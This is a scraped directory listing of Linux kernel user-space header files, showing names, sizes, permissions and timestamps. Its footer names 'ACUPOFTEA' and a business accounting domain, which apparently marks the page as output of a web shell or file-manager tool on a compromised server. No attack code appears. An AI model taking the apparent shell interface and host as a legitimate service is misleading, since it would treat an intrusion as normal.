3.42 KB
-rw-r--r--
2025-12-08 09:06:43
kfd_ioctl.h
text/x-c
28.14 KB
-rw-r--r--
2025-12-08 09:06:41
kfd_sysfs.h
text/x-c
4.25 KB
-rw-r--r--
2025-12-08 09:06:40
kvm.h
text/x-c
60.12 KB
-rw-r--r--
2025-12-08 09:06:41
kvm_para.h
text/x-c
1001 B
-rw-r--r--
2025-12-08 09:06:42
l2tp.h
text/x-c
5.46 KB
-rw-r--r--
2025-12-08 09:06:43
libc-compat.h
text/x-c
8.09 KB
-rw-r--r--
2025-12-08 09:06:42
lightnvm.h
text/x-c
4.92 KB
-rw-r--r--
2025-12-08 09:06:42
limits.h
text/x-c
937 B
-rw-r--r--
2025-12-08 09:06:41
lirc.h
text/x-c
7.63 KB
-rw-r--r--
2025-12-08 09:06:42
llc.h
text/x-c
3.09 KB
-rw-r--r--
2025-12-08 09:06:40
loop.h
text/x-c
3.42 KB
-rw-r--r--
2025-12-08 09:06:41
lp.h
text/x-c
4.09 KB
-rw-r--r--
2025-12-08 09:06:43
lwtunnel.h
text/x-c
2.13 KB
-rw-r--r--
2025-12-08 09:06:41
magic.h
text/x-c
3.45 KB
-rw-r--r--
2025-12-08 09:06:41
major.h
text/x-c
4.6 KB
-rw-r--r--
2025-12-08 09:06:41
map_to_7segment.h
text/x-c
7.08 KB
-rw-r--r--
2025-12-08 09:06:40
matroxfb.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
max2175.h
text/x-c
1.01 KB
-rw-r--r--
2025-12-08 09:06:42
mdio.h
text/x-c
16.87 KB
-rw-r--r--
2025-12-08 09:06:41
media-bus-format.h
text/x-c
6.26 KB
-rw-r--r--
2025-12-08 09:06:41
media.h
text/x-c
11.12 KB
-rw-r--r--
2025-12-08 09:06:41
mei.h
text/x-c
3.39 KB
-rw-r--r--
2025-12-08 09:06:41
membarrier.h
text/x-c
7.71 KB
-rw-r--r--
2025-12-08 09:06:40
memfd.h
text/x-c
1.29 KB
-rw-r--r--
2025-12-08 09:06:42
mempolicy.h
text/x-c
2.18 KB
-rw-r--r--
2025-12-08 09:06:42
meye.h
text/x-c
2.47 KB
-rw-r--r--
2025-12-08 09:06:41
mic_common.h
text/x-c
6.37 KB
-rw-r--r--
2025-12-08 09:06:42
mic_ioctl.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:41
mii.h
text/x-c
9.27 KB
-rw-r--r--
2025-12-08 09:06:42
minix_fs.h
text/x-c
2.07 KB
-rw-r--r--
2025-12-08 09:06:41
mman.h
text/x-c
1.35 KB
-rw-r--r--
2025-12-08 09:06:41
mmtimer.h
text/x-c
2.07 KB
-rw-r--r--
2025-12-08 09:06:41
module.h
text/x-c
255 B
-rw-r--r--
2025-12-08 09:06:42
mount.h
text/x-c
4.44 KB
-rw-r--r--
2025-12-08 09:06:41
mpls.h
text/x-c
2.25 KB
-rw-r--r--
2025-12-08 09:06:42
mpls_iptunnel.h
text/x-c
761 B
-rw-r--r--
2025-12-08 09:06:43
mptcp.h
text/x-c
5.48 KB
-rw-r--r--
2025-12-08 09:06:42
mqueue.h
text/x-c
2.15 KB
-rw-r--r--
2025-12-08 09:06:42
mroute.h
text/x-c
5.3 KB
-rw-r--r--
2025-12-08 09:06:41
mroute6.h
text/x-c
4.47 KB
-rw-r--r--
2025-12-08 09:06:41
mrp_bridge.h
text/x-c
1.67 KB
-rw-r--r--
2025-12-08 09:06:41
msdos_fs.h
text/x-c
6.8 KB
-rw-r--r--
2025-12-08 09:06:41
msg.h
text/x-c
3.29 KB
-rw-r--r--
2025-12-08 09:06:41
mtio.h
text/x-c
7.98 KB
-rw-r--r--
2025-12-08 09:06:42
n_r3964.h
text/x-c
2.35 KB
-rw-r--r--
2025-12-08 09:06:42
nbd-netlink.h
text/x-c
2.35 KB
-rw-r--r--
2025-12-08 09:06:42
nbd.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:42
ncsi.h
text/x-c
3.79 KB
-rw-r--r--
2025-12-08 09:06:42
ndctl.h
text/x-c
6.71 KB
-rw-r--r--
2025-12-08 09:06:42
neighbour.h
text/x-c
5.02 KB
-rw-r--r--
2025-12-08 09:06:42
net.h
text/x-c
2.04 KB
-rw-r--r--
2025-12-08 09:06:41
net_dropmon.h
text/x-c
2.85 KB
-rw-r--r--
2025-12-08 09:06:42
net_namespace.h
text/x-c
715 B
-rw-r--r--
2025-12-08 09:06:41
net_tstamp.h
text/x-c
5.67 KB
-rw-r--r--
2025-12-08 09:06:42
netconf.h
text/x-c
614 B
-rw-r--r--
2025-12-08 09:06:43
netdevice.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter.h
text/x-c
1.78 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_arp.h
text/x-c
445 B
-rw-r--r--
2025-12-08 09:06:41
netfilter_bridge.h
text/x-c
1.14 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_decnet.h
text/x-c
1.93 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_ipv4.h
text/x-c
2.12 KB
-rw-r--r--
2025-12-08 09:06:41
netfilter_ipv6.h
text/x-c
2.14 KB
-rw-r--r--
2025-12-08 09:06:41
netlink.h
text/x-c
11.23 KB
-rw-r--r--
2025-12-08 09:06:43
netlink_diag.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:43
netrom.h
text/x-c
807 B
-rw-r--r--
2025-12-08 09:06:42
nexthop.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:40
nfc.h
text/x-c
10.95 KB
-rw-r--r--
2025-12-08 09:06:41
nfs.h
text/x-c
4.39 KB
-rw-r--r--
2025-12-08 09:06:41
nfs2.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
nfs3.h
text/x-c
2.4 KB
-rw-r--r--
2025-12-08 09:06:41
nfs4.h
text/x-c
6.44 KB
-rw-r--r--
2025-12-08 09:06:42
nfs4_mount.h
text/x-c
1.89 KB
-rw-r--r--
2025-12-08 09:06:41
nfs_fs.h
text/x-c
1.6 KB
-rw-r--r--
2025-12-08 09:06:41
nfs_idmap.h
text/x-c
2.19 KB
-rw-r--r--
2025-12-08 09:06:42
nfs_mount.h
text/x-c
2.09 KB
-rw-r--r--
2025-12-08 09:06:40
nfsacl.h
text/x-c
718 B
-rw-r--r--
2025-12-08 09:06:41
nilfs2_api.h
text/x-c
7.41 KB
-rw-r--r--
2025-12-08 09:06:41
nilfs2_ondisk.h
text/x-c
17.61 KB
-rw-r--r--
2025-12-08 09:06:41
nitro_enclaves.h
text/x-c
12.84 KB
-rw-r--r--
2025-12-08 09:06:42
nl80211.h
text/x-c
327.41 KB
-rw-r--r--
2025-12-08 09:06:41
nsfs.h
text/x-c
639 B
-rw-r--r--
2025-12-08 09:06:41
nubus.h
text/x-c
8 KB
-rw-r--r--
2025-12-08 09:06:42
nvme_ioctl.h
text/x-c
2.06 KB
-rw-r--r--
2025-12-08 09:06:41
nvram.h
text/x-c
532 B
-rw-r--r--
2025-12-08 09:06:42
omap3isp.h
text/x-c
20.36 KB
-rw-r--r--
2025-12-08 09:06:41
omapfb.h
text/x-c
5.78 KB
-rw-r--r--
2025-12-08 09:06:41
oom.h
text/x-c
511 B
-rw-r--r--
2025-12-08 09:06:42
openat2.h
text/x-c
1.26 KB
-rw-r--r--
2025-12-08 09:06:42
openvswitch.h
text/x-c
39.24 KB
-rw-r--r--
2025-12-08 09:06:41
packet_diag.h
text/x-c
1.63 KB
-rw-r--r--
2025-12-08 09:06:41
param.h
text/x-c
141 B
-rw-r--r--
2025-12-08 09:06:40
parport.h
text/x-c
3.56 KB
-rw-r--r--
2025-12-08 09:06:42
patchkey.h
text/x-c
892 B
-rw-r--r--
2025-12-08 09:06:42
pci.h
text/x-c
1.35 KB
-rw-r--r--
2025-12-08 09:06:41
pci_regs.h
text/x-c
56.47 KB
-rw-r--r--
2025-12-08 09:06:41
pcitest.h
text/x-c
711 B
-rw-r--r--
2025-12-08 09:06:41
perf_event.h
text/x-c
39.63 KB
-rw-r--r--
2025-12-08 09:06:41
personality.h
text/x-c
2.05 KB
-rw-r--r--
2025-12-08 09:06:43
pfkeyv2.h
text/x-c
10.32 KB
-rw-r--r--
2025-12-08 09:06:42
pfrut.h
text/x-c
7.8 KB
-rw-r--r--
2025-12-08 09:06:42
pg.h
text/x-c
2.34 KB
-rw-r--r--
2025-12-08 09:06:41
phantom.h
text/x-c
1.62 KB
-rw-r--r--
2025-12-08 09:06:42
phonet.h
text/x-c
4.57 KB
-rw-r--r--
2025-12-08 09:06:40
pkt_cls.h
text/x-c
18.08 KB
-rw-r--r--
2025-12-08 09:06:43
pkt_sched.h
text/x-c
29.59 KB
-rw-r--r--
2025-12-08 09:06:42
pktcdvd.h
text/x-c
2.62 KB
-rw-r--r--
2025-12-08 09:06:41
pmu.h
text/x-c
5.19 KB
-rw-r--r--
2025-12-08 09:06:42
poll.h
text/x-c
22 B
-rw-r--r--
2025-12-08 09:06:43
posix_acl.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:41
posix_acl_xattr.h
text/x-c
1.09 KB
-rw-r--r--
2025-12-08 09:06:43
posix_types.h
text/x-c
1.07 KB
-rw-r--r--
2025-12-08 09:06:40
ppdev.h
text/x-c
3.14 KB
-rw-r--r--
2025-12-08 09:06:42
ppp-comp.h
text/x-c
2.47 KB
-rw-r--r--
2025-12-08 09:06:41
ppp-ioctl.h
text/x-c
5.35 KB
-rw-r--r--
2025-12-08 09:06:41
ppp_defs.h
text/x-c
4.99 KB
-rw-r--r--
2025-12-08 09:06:42
pps.h
text/x-c
4.62 KB
-rw-r--r--
2025-12-08 09:06:42
pr.h
text/x-c
1.05 KB
-rw-r--r--
2025-12-08 09:06:41
prctl.h
text/x-c
7.83 KB
-rw-r--r--
2025-12-08 09:06:42
psample.h
text/x-c
2.22 KB
-rw-r--r--
2025-12-08 09:06:41
psci.h
text/x-c
4.23 KB
-rw-r--r--
2025-12-08 09:06:43
psp-sev.h
text/x-c
4.48 KB
-rw-r--r--
2025-12-08 09:06:42
ptp_clock.h
text/x-c
7.28 KB
-rw-r--r--
2025-12-08 09:06:40
ptrace.h
text/x-c
3.59 KB
-rw-r--r--
2025-12-08 09:06:42
qemu_fw_cfg.h
text/x-c
2.41 KB
-rw-r--r--
2025-12-08 09:06:43
qnx4_fs.h
text/x-c
2.27 KB
-rw-r--r--
2025-12-08 09:06:42
qnxtypes.h
text/x-c
624 B
-rw-r--r--
2025-12-08 09:06:42
qrtr.h
text/x-c
893 B
-rw-r--r--
2025-12-08 09:06:41
quota.h
text/x-c
6.14 KB
-rw-r--r--
2025-12-08 09:06:40
radeonfb.h
text/x-c
360 B
-rw-r--r--
2025-12-08 09:06:42
random.h
text/x-c
1.34 KB
-rw-r--r--
2025-12-08 09:06:42
raw.h
text/x-c
365 B
-rw-r--r--
2025-12-08 09:06:43
rds.h
text/x-c
9.08 KB
-rw-r--r--
2025-12-08 09:06:43
reboot.h
text/x-c
1.31 KB
-rw-r--r--
2025-12-08 09:06:42
reiserfs_fs.h
text/x-c
775 B
-rw-r--r--
2025-12-08 09:06:40
reiserfs_xattr.h
text/x-c
533 B
-rw-r--r--
2025-12-08 09:06:42
resource.h
text/x-c
2.29 KB
-rw-r--r--
2025-12-08 09:06:40
rfkill.h
text/x-c
6.45 KB
-rw-r--r--
2025-12-08 09:06:41
rio_cm_cdev.h
text/x-c
3.17 KB
-rw-r--r--
2025-12-08 09:06:40
rio_mport_cdev.h
text/x-c
9.11 KB
-rw-r--r--
2025-12-08 09:06:42
romfs_fs.h
text/x-c
1.21 KB
-rw-r--r--
2025-12-08 09:06:42
rose.h
text/x-c
2.18 KB
-rw-r--r--
2025-12-08 09:06:42
route.h
text/x-c
2.28 KB
-rw-r--r--
2025-12-08 09:06:42
rpmsg.h
text/x-c
544 B
-rw-r--r--
2025-12-08 09:06:43
rseq.h
text/x-c
4.79 KB
-rw-r--r--
2025-12-08 09:06:41
rtc.h
text/x-c
3.92 KB
-rw-r--r--
2025-12-08 09:06:41
rtnetlink.h
text/x-c
19.73 KB
-rw-r--r--
2025-12-08 09:06:42
rxrpc.h
text/x-c
4.96 KB
-rw-r--r--
2025-12-08 09:06:42
scc.h
text/x-c
4.49 KB
-rw-r--r--
2025-12-08 09:06:41
sched.h
text/x-c
2.73 KB
-rw-r--r--
2025-12-08 09:06:40
scif_ioctl.h
text/x-c
6.23 KB
-rw-r--r--
2025-12-08 09:06:42
screen_info.h
text/x-c
2.42 KB
-rw-r--r--
2025-12-08 09:06:42
sctp.h
text/x-c
35.15 KB
-rw-r--r--
2025-12-08 09:06:41
sdla.h
text/x-c
2.77 KB
-rw-r--r--
2025-12-08 09:06:42
seccomp.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:43
securebits.h
text/x-c
2.64 KB
-rw-r--r--
2025-12-08 09:06:41
sed-opal.h
text/x-c
3.2 KB
-rw-r--r--
2025-12-08 09:06:40
seg6.h
text/x-c
1.14 KB
-rw-r--r--
2025-12-08 09:06:42
seg6_genl.h
text/x-c
589 B
-rw-r--r--
2025-12-08 09:06:41
seg6_hmac.h
text/x-c
423 B
-rw-r--r--
2025-12-08 09:06:42
seg6_iptunnel.h
text/x-c
927 B
-rw-r--r--
2025-12-08 09:06:41
seg6_local.h
text/x-c
2.01 KB
-rw-r--r--
2025-12-08 09:06:41
selinux_netlink.h
text/x-c
1.17 KB
-rw-r--r--
2025-12-08 09:06:42
sem.h
text/x-c
2.97 KB
-rw-r--r--
2025-12-08 09:06:41
serial.h
text/x-c
3.78 KB
-rw-r--r--
2025-12-08 09:06:42
serial_core.h
text/x-c
6.1 KB
-rw-r--r--
2025-12-08 09:06:42
serial_reg.h
text/x-c
15.13 KB
-rw-r--r--
2025-12-08 09:06:41
serio.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:42
sev-guest.h
text/x-c
2.25 KB
-rw-r--r--
2025-12-08 09:06:42
shm.h
text/x-c
3.7 KB
-rw-r--r--
2025-12-08 09:06:42
signal.h
text/x-c
388 B
-rw-r--r--
2025-12-08 09:06:43
signalfd.h
text/x-c
1.2 KB
-rw-r--r--
2025-12-08 09:06:41
smc.h
text/x-c
8.31 KB
-rw-r--r--
2025-12-08 09:06:42
smc_diag.h
text/x-c
2.66 KB
-rw-r--r--
2025-12-08 09:06:41
smiapp.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:42
snmp.h
text/x-c
13.34 KB
-rw-r--r--
2025-12-08 09:06:42
sock_diag.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:41
socket.h
text/x-c
901 B
-rw-r--r--
2025-12-08 09:06:42
sockios.h
text/x-c
5.96 KB
-rw-r--r--
2025-12-08 09:06:42
sonet.h
text/x-c
2.24 KB
-rw-r--r--
2025-12-08 09:06:41
sonypi.h
text/x-c
5.18 KB
-rw-r--r--
2025-12-08 09:06:42
sound.h
text/x-c
1.21 KB
-rw-r--r--
2025-12-08 09:06:40
soundcard.h
text/x-c
44.96 KB
-rw-r--r--
2025-12-08 09:06:41
stat.h
text/x-c
6.2 KB
-rw-r--r--
2025-12-08 09:06:41
stddef.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:41
stm.h
text/x-c
1.25 KB
-rw-r--r--
2025-12-08 09:06:41
string.h
text/x-c
238 B
-rw-r--r--
2025-12-08 09:06:42
suspend_ioctls.h
text/x-c
1.4 KB
-rw-r--r--
2025-12-08 09:06:41
swab.h
text/x-c
6.76 KB
-rw-r--r--
2025-12-08 09:06:42
switchtec_ioctl.h
text/x-c
5.14 KB
-rw-r--r--
2025-12-08 09:06:43
sync_file.h
text/x-c
2.82 KB
-rw-r--r--
2025-12-08 09:06:41
synclink.h
text/x-c
8.77 KB
-rw-r--r--
2025-12-08 09:06:43
sysctl.h
text/x-c
25.24 KB
-rw-r--r--
2025-12-08 09:06:41
sysinfo.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:42
target_core_user.h
text/x-c
4.52 KB
-rw-r--r--
2025-12-08 09:06:43
taskstats.h
text/x-c
7.01 KB
-rw-r--r--
2025-12-08 09:06:42
tcp.h
text/x-c
9.69 KB
-rw-r--r--
2025-12-08 09:06:41
tcp_metrics.h
text/x-c
1.51 KB
-rw-r--r--
2025-12-08 09:06:42
tdx-guest.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:43
tee.h
text/x-c
12.86 KB
-rw-r--r--
2025-12-08 09:06:42
termios.h
text/x-c
506 B
-rw-r--r--
2025-12-08 09:06:41
thermal.h
text/x-c
3.23 KB
-rw-r--r--
2025-12-08 09:06:42
time.h
text/x-c
1.71 KB
-rw-r--r--
2025-12-08 09:06:41
time_types.h
text/x-c
1.15 KB
-rw-r--r--
2025-12-08 09:06:43
timerfd.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:40
times.h
text/x-c
278 B
-rw-r--r--
2025-12-08 09:06:41
timex.h
text/x-c
6.25 KB
-rw-r--r--
2025-12-08 09:06:42
tiocl.h
text/x-c
1.69 KB
-rw-r--r--
2025-12-08 09:06:40
tipc.h
text/x-c
8.62 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_config.h
text/x-c
14.36 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_netlink.h
text/x-c
9.17 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_sockets_diag.h
text/x-c
468 B
-rw-r--r--
2025-12-08 09:06:41
tls.h
text/x-c
4.19 KB
-rw-r--r--
2025-12-08 09:06:42
toshiba.h
text/x-c
1.88 KB
-rw-r--r--
2025-12-08 09:06:41
tty.h
text/x-c
1.55 KB
-rw-r--r--
2025-12-08 09:06:41
tty_flags.h
text/x-c
4.42 KB
-rw-r--r--
2025-12-08 09:06:41
types.h
text/x-c
1.44 KB
-rw-r--r--
2025-12-08 09:06:41
udf_fs_i.h
text/x-c
697 B
-rw-r--r--
2025-12-08 09:06:42
udp.h
text/x-c
1.62 KB
-rw-r--r--
2025-12-08 09:06:42
uhid.h
text/x-c
4.54 KB
-rw-r--r--
2025-12-08 09:06:41
uinput.h
text/x-c
9.04 KB
-rw-r--r--
2025-12-08 09:06:42
uio.h
text/x-c
732 B
-rw-r--r--
2025-12-08 09:06:42
uleds.h
text/x-c
798 B
-rw-r--r--
2025-12-08 09:06:41
ultrasound.h
text/x-c
4.46 KB
-rw-r--r--
2025-12-08 09:06:43
un.h
text/x-c
384 B
-rw-r--r--
2025-12-08 09:06:43
unistd.h
text/x-c
220 B
-rw-r--r--
2025-12-08 09:06:42
unix_diag.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:43
usbdevice_fs.h
text/x-c
8.12 KB
-rw-r--r--
2025-12-08 09:06:42
usbip.h
text/x-c
640 B
-rw-r--r--
2025-12-08 09:06:40
userfaultfd.h
text/x-c
7.59 KB
-rw-r--r--
2025-12-08 09:06:42
userio.h
text/x-c
1.48 KB
-rw-r--r--
2025-12-08 09:06:42
utime.h
text/x-c
215 B
-rw-r--r--
2025-12-08 09:06:40
utsname.h
text/x-c
669 B
-rw-r--r--
2025-12-08 09:06:43
uuid.h
text/x-c
1.32 KB
-rw-r--r--
2025-12-08 09:06:41
uvcvideo.h
text/x-c
2.57 KB
-rw-r--r--
2025-12-08 09:06:41
v4l2-common.h
text/x-c
4.08 KB
-rw-r--r--
2025-12-08 09:06:40
v4l2-controls.h
text/x-c
50.56 KB
-rw-r--r--
2025-12-08 09:06:41
v4l2-dv-timings.h
text/x-c
30.82 KB
-rw-r--r--
2025-12-08 09:06:42
v4l2-mediabus.h
text/x-c
4.98 KB
-rw-r--r--
2025-12-08 09:06:42
v4l2-subdev.h
text/x-c
5.95 KB
-rw-r--r--
2025-12-08 09:06:41
vbox_err.h
text/x-c
7.09 KB
-rw-r--r--
2025-12-08 09:06:42
vbox_vmmdev_types.h
text/x-c
8.16 KB
-rw-r--r--
2025-12-08 09:06:41
vboxguest.h
text/x-c
8.52 KB
-rw-r--r--
2025-12-08 09:06:43
vdpa.h
text/x-c
1.39 KB
-rw-r--r--
2025-12-08 09:06:41
version.h
text/plain
430 B
-rw-r--r--
2025-12-08 09:07:26
veth.h
text/x-c
224 B
-rw-r--r--
2025-12-08 09:06:43
vfio.h
text/x-c
51 KB
-rw-r--r--
2025-12-08 09:06:41
vfio_ccw.h
text/x-c
1.29 KB
-rw-r--r--
2025-12-08 09:06:43
vfio_zdev.h
text/x-c
2.48 KB
-rw-r--r--
2025-12-08 09:06:41
vhost.h
text/x-c
6.27 KB
-rw-r--r--
2025-12-08 09:06:41
vhost_types.h
text/x-c
3.9 KB
-rw-r--r--
2025-12-08 09:06:42
videodev2.h
text/x-c
88.61 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_9p.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_balloon.h
text/x-c
5.15 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_blk.h
text/x-c
6.64 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_bt.h
text/x-c
772 B
-rw-r--r--
2025-12-08 09:06:42
virtio_config.h
text/x-c
3.91 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_console.h
text/x-c
3.06 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_crypto.h
text/x-c
13.55 KB
-rw-r--r--
2025-12-08 09:06:40
virtio_fs.h
text/x-c
572 B
-rw-r--r--
2025-12-08 09:06:42
virtio_gpu.h
text/x-c
11.19 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_ids.h
text/x-c
3.19 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_input.h
text/x-c
2.45 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_iommu.h
text/x-c
3.69 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_mem.h
text/x-c
6.99 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_mmio.h
text/x-c
4.85 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_net.h
text/x-c
10.3 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_pci.h
text/x-c
7.23 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_ring.h
text/x-c
7.32 KB
-rw-r--r--
2025-12-08 09:06:43
virtio_rng.h
text/x-c
265 B
-rw-r--r--
2025-12-08 09:06:43
virtio_scsi.h
text/x-c
5.89 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_snd.h
text/x-c
9.09 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_types.h
text/x-c
2.1 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_vsock.h
text/x-c
3.01 KB
-rw-r--r--
2025-12-08 09:06:42
vm_sockets.h
text/x-c
6.34 KB
-rw-r--r--
2025-12-08 09:06:40
vm_sockets_diag.h
text/x-c
963 B
-rw-r--r--
2025-12-08 09:06:43
vmcore.h
text/x-c
431 B
-rw-r--r--
2025-12-08 09:06:41
vsockmon.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:42
vt.h
text/x-c
2.99 KB
-rw-r--r--
2025-12-08 09:06:42
vtpm_proxy.h
text/x-c
1.68 KB
-rw-r--r--
2025-12-08 09:06:41
wait.h
text/x-c
682 B
-rw-r--r--
2025-12-08 09:06:42
wanrouter.h
text/x-c
453 B
-rw-r--r--
2025-12-08 09:06:42
watchdog.h
text/x-c
2.28 KB
-rw-r--r--
2025-12-08 09:06:42
wimax.h
text/x-c
8.17 KB
-rw-r--r--
2025-12-08 09:06:42
wireless.h
text/x-c
41.7 KB
-rw-r--r--
2025-12-08 09:06:41
wmi.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:42
x25.h
text/x-c
3.48 KB
-rw-r--r--
2025-12-08 09:06:42
xattr.h
text/x-c
2.79 KB
-rw-r--r--
2025-12-08 09:06:41
xdp_diag.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
xfrm.h
text/x-c
11.71 KB
-rw-r--r--
2025-12-08 09:06:42
xilinx-v4l2-controls.h
text/x-c
2.91 KB
-rw-r--r--
2025-12-08 09:06:42
zorro.h
text/x-c
3.22 KB
-rw-r--r--
2025-12-08 09:06:42
zorro_ids.h
text/plain
29.26 KB
-rw-r--r--
2025-12-08 09:06:42
~ ACUPOFTEA - accounting.gulfstore-gcc.com